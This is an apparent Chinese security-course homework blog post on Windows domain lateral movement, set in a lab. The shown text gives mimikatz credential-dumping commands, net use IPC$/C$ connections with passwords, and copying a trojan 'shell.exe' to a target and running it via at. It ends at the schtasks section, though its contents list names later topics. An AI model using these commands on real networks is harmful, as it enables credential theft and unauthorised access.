<!DOCTYPE html>
<html>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="第九天作业（发送邮箱：&amp;#116;&amp;#x69;&amp;#109;&amp;#101;&amp;#108;&amp;#x69;&amp;#x6e;&amp;#x65;&amp;#x73;&amp;#x65;&amp;#x63;&amp;#64;&amp;#x31;&amp;#x36;&amp;#x33;&amp;#x2e;&amp;#99;&amp;#x6f;&amp;#x6d;）：作业附件：（ID为群内名称十五天作业要一样）第九天_ID_作业名注意：邮件标题与附件一致 重点：1.链接受害机器方法（pth、ipc、psexec…">
<meta property="og:type" content="article">
<meta property="og:title" content="B1ink">
<meta property="og:url" content="http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/index.html">
<meta property="og:site_name" content="B1ink">
<meta property="og:description" content="第九天作业（发送邮箱：&amp;#116;&amp;#x69;&amp;#109;&amp;#101;&amp;#108;&amp;#x69;&amp;#x6e;&amp;#x65;&amp;#x73;&amp;#x65;&amp;#x63;&amp;#64;&amp;#x31;&amp;#x36;&amp;#x33;&amp;#x2e;&amp;#99;&amp;#x6f;&amp;#x6d;）：作业附件：（ID为群内名称十五天作业要一样）第九天_ID_作业名注意：邮件标题与附件一致 重点：1.链接受害机器方法（pth、ipc、psexec…">
<meta property="og:locale">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313125110589.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313131030220.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313131251184.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313132651884.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313133120045.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313140255771.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313142357084.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313142413509.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314102230686.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314102432602.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314103015388.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319151914844.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220314104041713.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315110735556.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220316094503052.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319163626310.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319163815204.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220319164714029.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315125448342.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315133654271.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315140344624.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220315141129873.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318105303042.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318181935519.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220318182014227.png">
<meta property="og:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220316151707163.png">
<meta property="article:published_time" content="2022-06-06T04:58:33.960Z">
<meta property="article:modified_time" content="2022-05-23T08:03:15.080Z">
<meta property="article:author" content="B1ink">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313125110589.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>B1ink</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2022/06/06/hello-world/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&text="><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&is_video=false&description="><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&title="><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&name=&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2022/06/06/%E7%AC%AC%E4%B9%9D%E5%A4%A9_b1ink_%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/&t="><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">1.</span> <span class="toc-text">横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E5%9F%9F%E5%86%85%E5%8D%95%E6%9C%BA%E5%AF%86%E7%A0%81%E4%B8%8EHash"><span class="toc-number">1.1.</span> <span class="toc-text">获取域内单机密码与Hash</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Windows%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6%8E%A5%E5%91%BD%E4%BB%A4%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.2.</span> <span class="toc-text">利用Windows远程连接命令进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8BIPC%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.2.1.</span> <span class="toc-text">建立IPC连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BB%BA%E7%AB%8B%E5%85%B6%E4%BB%96%E5%85%B1%E4%BA%AB%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.2.2.</span> <span class="toc-text">建立其他共享连接</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Windows%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.3.</span> <span class="toc-text">利用Windows计划任务进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#at%E5%91%BD%E4%BB%A4"><span class="toc-number">1.3.1.</span> <span class="toc-text">at命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#schtasks-%E5%91%BD%E4%BB%A4"><span class="toc-number">1.3.2.</span> <span class="toc-text">schtasks 命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAWindows%E6%9C%8D%E5%8A%A1%E6%9D%A5%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.4.</span> <span class="toc-text">创建Windows服务来进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#sc%E5%91%BD%E4%BB%A4"><span class="toc-number">1.4.1.</span> <span class="toc-text">sc命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8PsExec%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.5.</span> <span class="toc-text">利用PsExec工具进行横向渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#windows%E4%B8%8B%E7%9A%84psexec"><span class="toc-number">1.5.1.</span> <span class="toc-text">windows下的psexec</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#metasploit%E7%9A%84PsExec%E6%A8%A1%E5%9D%97"><span class="toc-number">1.5.2.</span> <span class="toc-text">metasploit的PsExec模块</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8Smbexec%E5%B7%A5%E5%85%B7%E8%BF%9B%E8%A1%8C%E6%A8%AA%E5%90%91%E6%B8%97%E9%80%8F"><span class="toc-number">1.6.</span> <span class="toc-text">利用Smbexec工具进行横向渗透</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8WMI%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-number">1.7.</span> <span class="toc-text">利用WMI横向移动</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#wmic"><span class="toc-number">1.7.1.</span> <span class="toc-text">wmic</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wmiexec"><span class="toc-number">1.7.2.</span> <span class="toc-text">wmiexec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DCOM"><span class="toc-number">1.8.</span> <span class="toc-text">DCOM</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-DCOM-%E5%9C%A8%E6%9C%AC%E5%9C%B0%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.1.</span> <span class="toc-text">使用 DCOM 在本地执行命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8-DCOM-%E5%9C%A8%E8%BF%9C%E7%A8%8B%E4%B8%BB%E6%9C%BA%E4%B8%8A%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.</span> <span class="toc-text">使用 DCOM 在远程主机上执行命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-MMC20-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.1.</span> <span class="toc-text">调用 MMC20.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-ShellWindows-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.2.</span> <span class="toc-text">调用 ShellWindows 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Excel-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.3.</span> <span class="toc-text">调用 Excel.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-ShellBrowserWindow-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.4.</span> <span class="toc-text">调用 ShellBrowserWindow 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Visio-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.5.</span> <span class="toc-text">调用 Visio.Application 远程执行命令</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B0%83%E7%94%A8-Outlook-Application-%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4"><span class="toc-number">1.8.2.6.</span> <span class="toc-text">调用 Outlook.Application 远程执行命令</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dcomexec"><span class="toc-number">1.8.3.</span> <span class="toc-text">dcomexec</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB"><span class="toc-number">1.9.</span> <span class="toc-text">Hash传递攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMB%E6%B8%97%E9%80%8F%E8%87%B3Hash%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BB%E7%9A%84%E5%8E%9F%E7%90%86"><span class="toc-number">1.9.1.</span> <span class="toc-text">SMB渗透至Hash传递攻击的原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz"><span class="toc-number">1.9.2.</span> <span class="toc-text">mimikatz</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#MSF"><span class="toc-number">1.9.3.</span> <span class="toc-text">MSF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wmic-1"><span class="toc-number">1.9.4.</span> <span class="toc-text">wmic</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A5%A8%E6%8D%AE%E4%BC%A0%E9%80%92%E6%94%BB%E5%87%BBPTT"><span class="toc-number">1.10.</span> <span class="toc-text">票据传递攻击PTT</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MS14-068"><span class="toc-number">1.10.1.</span> <span class="toc-text">MS14-068</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mimikatz%E5%AF%BC%E5%87%BA%E7%A5%A8%E6%8D%AE"><span class="toc-number">1.10.2.</span> <span class="toc-text">mimikatz导出票据</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#kekeo"><span class="toc-number">1.10.3.</span> <span class="toc-text">kekeo</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NTLM-Relay%E6%94%BB%E5%87%BB"><span class="toc-number">1.11.</span> <span class="toc-text">NTLM Relay攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#NTLM-Relay"><span class="toc-number">1.12.</span> <span class="toc-text">NTLM-Relay</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NTLM%E7%9B%B8%E5%85%B3"><span class="toc-number">1.12.1.</span> <span class="toc-text">NTLM相关</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Net-NTLM-hash"><span class="toc-number">1.12.2.</span> <span class="toc-text">Net-NTLM hash</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">B1ink</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-06-06T04:58:33.960Z" itemprop="datePublished">2022-06-06</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <hr>
<p>第九天作业<br>（发送邮箱：<a href="mailto:&#116;&#x69;&#109;&#101;&#108;&#x69;&#x6e;&#x65;&#x73;&#x65;&#x63;&#64;&#x31;&#x36;&#x33;&#x2e;&#99;&#x6f;&#x6d;">&#116;&#x69;&#109;&#101;&#108;&#x69;&#x6e;&#x65;&#x73;&#x65;&#x63;&#64;&#x31;&#x36;&#x33;&#x2e;&#99;&#x6f;&#x6d;</a>）：<br>作业附件：（ID为群内名称十五天作业要一样）<br>第九天_ID_作业名<br>注意：邮件标题与附件一致</p>
<p>重点：<br>1.链接受害机器方法（pth、ipc、psexec….）<br>2.了解域概念<br>拓展：<br>1.NTLM-Relay</p>
<p>参考资料：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/zhangge3663/article/details/109305721">https://blog.csdn.net/zhangge3663/article/details/109305721</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_30500473/article/details/94863024">https://blog.csdn.net/weixin_30500473/article/details/94863024</a><br><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/PfjdhDHKh42oUpB_9PgZow">https://mp.weixin.qq.com/s/PfjdhDHKh42oUpB_9PgZow</a><br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_41874930/article/details/108825010">https://blog.csdn.net/qq_41874930/article/details/108825010</a><br><a target="_blank" rel="noopener" href="https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/#4-xxe-to-%E5%9F%9F%E6%8E%A7">https://blog.ateam.qianxin.com/post/zhe-shi-yi-pian-bu-yi-yang-de-zhen-shi-shen-tou-ce-shi-an-li-fen-xi-wen-zhang/#4-xxe-to-%E5%9F%9F%E6%8E%A7</a></p>
<hr>
<h1 id="横向移动"><a href="#横向移动" class="headerlink" title="横向移动"></a>横向移动</h1><p>win2008 192.168.147.190</p>
<p>win7 192.168.147.194 192.168.1.3</p>
<h2 id="获取域内单机密码与Hash"><a href="#获取域内单机密码与Hash" class="headerlink" title="获取域内单机密码与Hash"></a>获取域内单机密码与Hash</h2><p>在内网渗透中，很多横向移动的方法都需要攻击者先获取域用户的密码或者Hash值才能进行，比如哈希传递攻击、各种票据传递，还有黄金票据维持权限等等。</p>
<p><strong>mimikatz</strong></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug   //提升至debug权限</span><br><span class="line">sekurlsa::logonpasswords  //抓取密码</span><br></pre></td></tr></table></figure></div>

<h2 id="利用Windows远程连接命令进行横向渗透"><a href="#利用Windows远程连接命令进行横向渗透" class="headerlink" title="利用Windows远程连接命令进行横向渗透"></a>利用Windows远程连接命令进行横向渗透</h2><p>在渗透测试中，拿到目标机器的用户明文密码或者NTLM Hash后，可以用Windows自带的方法对远程目标系统进行命令行下的连接操作，连接远程主机并执行相关命令，也可以通过PTH的方法，将散列值或明文密码传递到目标机器中进行验证。</p>
<h3 id="建立IPC连接"><a href="#建立IPC连接" class="headerlink" title="建立IPC连接"></a>建立IPC连接</h3><p>IPC$(Internet Process Connection) 是NT2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。IPC可以通过验证用户名和密码获得相应的权限，通常在远程管理计算机和查看计算机的共享资源时使用。</p>
<p>通过ipc$,可以与目标及其建立连接。利用这个连接，不仅可以访问目标机器中的文件，进行上传、下载等操作，还可以在目标机器上运行其他命令，以获取目标机器的目录结构、用户列表等信息。</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">net use \\&lt;DC的IP&gt;\ipc$ &quot;password&quot; /user:&quot;username&quot;</span><br><span class="line">net use \\192.168.168.190\ipc$ &quot;password&quot; /user:&quot;administrator&quot;</span><br><span class="line">net user //查看当前主机所建立的连接</span><br></pre></td></tr></table></figure></div>

<img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313125110589.png" alt="image-20220313125110589" style="zoom:80%;" />

<p><strong>建立连接后</strong></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">dir \\192.168.147.190\c$   \\列出c盘目录</span><br><span class="line">copy test.txt \\192.168.147.190\c$   \\复制文件</span><br><span class="line">tasklist /s  指要查看的远程系统的IP地址</span><br><span class="line">			  /u  指要查看的远程系统的IP地址</span><br><span class="line"> 		  /p  指定该用户的密码</span><br><span class="line">tasklist /S 192.168.147.190 /U administrator /P password</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313131030220.png"></p>
<p><strong>建立ipc$连接的条件:</strong></p>
<ul>
<li>目标主机开启139与4445端口</li>
<li>目标主机管理员开启了ipc$共享</li>
</ul>
<p><strong>使用完ipc$后</strong></p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\192.168.147.190 /del /y</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313131251184.png"></p>
<h3 id="建立其他共享连接"><a href="#建立其他共享连接" class="headerlink" title="建立其他共享连接"></a>建立其他共享连接</h3><p>除了IPC链接，我们还可以与目标主机的其他共享建立连接，比如建立c$盘共享连接：</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net use \\192.168.147.190\c$ &quot;password&quot; /user:&quot;administrator&quot;</span><br></pre></td></tr></table></figure></div>

<h2 id="利用Windows计划任务进行横向渗透"><a href="#利用Windows计划任务进行横向渗透" class="headerlink" title="利用Windows计划任务进行横向渗透"></a>利用Windows计划任务进行横向渗透</h2><h3 id="at命令"><a href="#at命令" class="headerlink" title="at命令"></a>at命令</h3><p><strong>方法一：</strong></p>
<ol>
<li>确认目标主机时间</li>
<li>copy木马到目标主机</li>
<li>at命令创建计划任务，让目标主机在指定时间执行木马</li>
<li>计划任务结束后，删除</li>
</ol>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">net time \\192.168.147.190</span><br><span class="line">copy shell.exe \\192.168.147.190\c$</span><br><span class="line">at \\192.168.147.190 12:00:00 c:\shell.exe</span><br><span class="line">at \\192.168.147.190 1 /delete</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313132651884.png"></p>
<p><strong>方法二：</strong></p>
<p>我们还可以利用at计划任务直接执行系统命令，但由于不会回显，所以我们要将执行的结果写入到一个文本文件中，然后远程读取</p>
<div class="highlight-wrap" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">at \\192.168.147.190 12:00:00 cmd.exe /c &quot;ipconfig &gt; C:\result.txt&quot;</span><br><span class="line">at \\192.168.147.190 17:05:00 cmd.exe /c &quot;&lt;命令&gt;&quot; &gt; 目录\result.txt</span><br></pre></td></tr></table></figure></div>

<p><img src="https://b1ink.oss-cn-hangzhou.aliyuncs.com/markdown_photo-main/Intranet/image-20220313133120045.png"></p>
<h3 id="schtasks-命令"><a href="#schtasks-命令" class="headerlink" title="schtasks 命令"></a>schtasks 命令</h3><p>at命令已经被Windows Vista、Windows Server 2008及之后版本的操作系统废弃了，代替他的是schtasks命令。schtasks命令比at命令更为灵活、自由。</p>
